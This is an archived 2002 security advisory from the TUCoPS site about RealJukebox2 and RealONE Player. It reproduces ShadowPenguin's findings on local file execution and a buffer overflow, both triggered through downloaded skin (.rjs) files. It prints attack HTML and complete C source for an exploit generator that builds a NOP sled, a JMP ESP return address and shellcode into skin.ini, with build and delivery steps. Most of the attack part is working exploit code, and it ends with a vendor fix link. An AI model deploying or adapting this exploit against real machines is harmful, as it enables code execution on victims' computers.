Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: win5534.htm

RealPlayer overflow and local file execution via skin download



12th Jul 2002 [SBWID-5534]
COMMAND

	Real players overflow and local file execution via skin download

SYSTEMS AFFECTED

	 RealONE Player Gold Ver. 6.0.10.505

	 RealJukebox2 Ver. 1.0.2.379, Ver. 1.0.2.340

	 RealJukebox2 Plus Ver. 1.0.2.379, Ver. 1.0.2.340

	

PROBLEM

	In      UNYUN      [unyun@shadowpenguin.org]      of       ShadowPenguin
	[http://www.shadowpenguin.org] advisories [#48], [#47] :
	

	

	 Remote scripting

	 ================

	

	Skin file download permits remote execution : first, make the  following
	skin.ini    file    that     contains     HTML     tag     to     launch
	\"c:\\winnt\\notepad.exe\".
	

	[skin.ini]

	

	<html>

	<OBJECT CLASSID=\'CLSID:15589FA1-C456-11CE-BF01-00AA0055595A\'

	CODEBASE=\'file://c:\\winnt\\notepad.exe\'></OBJECT>

	</html>

	

	Compress this skin.ini file by Zip utility, rename file  extension  from
	\"zip\" to \"rjs\".
	

	Second, make the following HTML file (test.html), put  it  on  webserver
	together with previous made \"rjs\" file (exploit.rjs).
	

	[test.html]

	

	<html>

	<META HTTP-EQUIV=\"Refresh\" CONTENT=\"20;URL=file://c:\\Program

	Files\\Real\\RealJukebox\\temp\\~rjbtemp0\\skin.ini\">

	<iframe src=\"exploit.rjs\">

	</html>

	

	Finally, browse test.html by Internet Explorer.  exploit.rjs  is  loaded
	into RealJukebox2 when  test.html  is  browsed,  the  skin.ini  file  is
	extracted. When RealJukebox2 extracts the skin file, RealJukebox2  makes
	\"~rjbtemp?\" directory on \"temp\" directory which  is  placed  on  the
	install  directory  of  RealJukebox2.  \'?\'  of  \"~rjbtemp?\"  is  the
	sequence number, but,  this  value  is  \'0\'  if  RealJukebox2  is  not
	launched now and RealJukebox2 has never terminated abnormally.  skin.ini
	file is extracted \"~rjbtemp?\" directory, test.html refers it after  20
	second.
	

	

	 Buffer Overflow

	 ===============

	

	The image files that constructs the visual appearance are  specified  in
	\"CONTROLnImage\" field of \"skin.ini\" file. RealJukebox2  and  RealONE
	Player Gold  overflow  when  the  long  filename  is  specified  in  the
	\"CONTROLnImage\" field.
	

	Make a following skin.ini file, and zip it.
	

	[MAIN]

	Application=RealJukebox

	Version=2

	SkinFamilyCount=5

	

	CONTROL1Image=aaaaaaaaaa...  long\'a\'

	

	If you rename the file extension from \"zip\" to \"rjs\" and drop it  to
	the web browser such as  Internet  Explorer,  RealJukebox2  is  launched
	automatically  and  it  is  crashed  by  buffer  overflow.  This  buffer
	overflow overwrites the RET address which is stored from  buffer  offert
	28, it changes the value of EIP register. If you specify  the  value  of
	EIP register to the address which is stored the malicious code,  it  can
	be executed after RET instruction is executed.
	

	

	 Exploit

	 =======

	

	This sample generates a skin.ini file that contains  the  log-off  code.
	If you test it, you must zip the generated skin.ini file and rename  the
	extension from \"zip\" to \"rjs\". This sample code can be  compiled  by
	Visual C++ 6.0. This sample code was  checked  under  the  environmentof
	Windows2000 Professional SP2 (Japanese)+RealJukebox2 Ver. 1.0.2.340.
	

	/*===========================================================

	   RealJukebox2 1.0.2.379 Exploit

	   for Windows Windows2000 Professional (Service Pack 2)

	   The Shadow Penguin Security (http://www.shadowpenguin.org)

	   Written by UNYUN (unyun@shadowpenguin.org)

	  ============================================================

	*/

	

	#include <stdio.h>

	#include <windows.h>

	

	#define MAXBUF          4096

	#define KERNEL_NAME     \"kernel32.dll\"

	#define SKIN_INI        \"skin.ini\"

	#define INI_FILE \\

	\"[MAIN]\\n\"\\

	\"Application=RealJukebox\\n\"\\

	\"Version=2\\n\"\\

	\"SkinFamilyCount=5\\n\"\\

	\"\\n\"\\

	\"CONTROL1Image=%s\\n\"

	

	#define NOP             0x90

	#define FAKE_OFS1       36

	#define FAKE_VAL1       0x7FFDF0F0

	#define RETADR_OFS      28

	#define CODE_OFS        60

	#define RETADR_2000pro  0x77e0af64

	

	static unsigned char egg_2000pro[512]={

	  0xB8,0xA5,0xFA,0xE1,0x77,0x33,0xDB,0xB3,

	  0x04,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD,

	  0x00

	};

	

	unsigned int search_mem(unsigned char *st,unsigned char *ed,

	                unsigned char c1,unsigned char c2)

	{

	    unsigned char   *p;

	    unsigned int    adr;

	

	    for (p=st;p<ed;p++)

	        if (*p==c1 && *(p+1)==c2){

	            adr=(unsigned int)p;

	            if ((adr&0xff)==0) continue;

	            if (((adr>>8)&0xff)==0) continue;

	            if (((adr>>16)&0xff)==0) continue;

	            if (((adr>>24)&0xff)==0) continue;

	            return(adr);

	        }

	    return(0);

	}

	

	void valset(char *buf,unsigned int val)

	{

	    buf[0]=val&0xff;

	    buf[1]=(val>>8)&0xff;

	    buf[2]=(val>>16)&0xff;

	    buf[3]=(val>>24)&0xff;

	}

	

	int main(int argc,char *argv[])

	{

	    FILE            *fp;

	    char            buf[MAXBUF];

	    unsigned int    tgt,exw;

	    unsigned char   *kp;

	

	    if ((fp=fopen(SKIN_INI,\"wb\"))==NULL){

	        printf(\"Can not write file.\\n\");

	        exit(1);

	    }

	    memset(buf,NOP,sizeof(buf));

	    buf[sizeof(buf)-1]=\'\\0\';

	

	    if ((kp=(unsigned char *)LoadLibrary(KERNEL_NAME))==NULL){

	        printf(\"Can not find %s\\n\",KERNEL_NAME);

	        exit(1);

	    }

	    tgt=search_mem(kp,kp+0x100000,0xff,0xe4);

	    if (tgt==0) tgt=RETADR_2000pro;

	    printf(\"kp            = 0x%x\\n\",kp);

	    printf(\"JMP ESP addr  = 0x%x\\n\",tgt);

	    exw=(unsigned int)ExitWindowsEx;

	    printf(\"ExitWindowsEx = 0x%x\\n\",exw);

	

	    valset(buf+FAKE_OFS1,FAKE_VAL1);

	    valset(buf+RETADR_OFS,tgt);

	    valset(egg_2000pro+1,exw);

	    strncpy(buf+CODE_OFS,egg_2000pro,strlen(egg_2000pro));

	

	    fprintf(fp,INI_FILE,buf);

	    fclose(fp);

	    printf(\"Created \'%s\'.\\n\",SKIN_INI);

	    return(0);

	}

	

SOLUTION

	See :
	

	http://service.real.com/help/faq/security/bufferoverrun07092002.html

	

	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH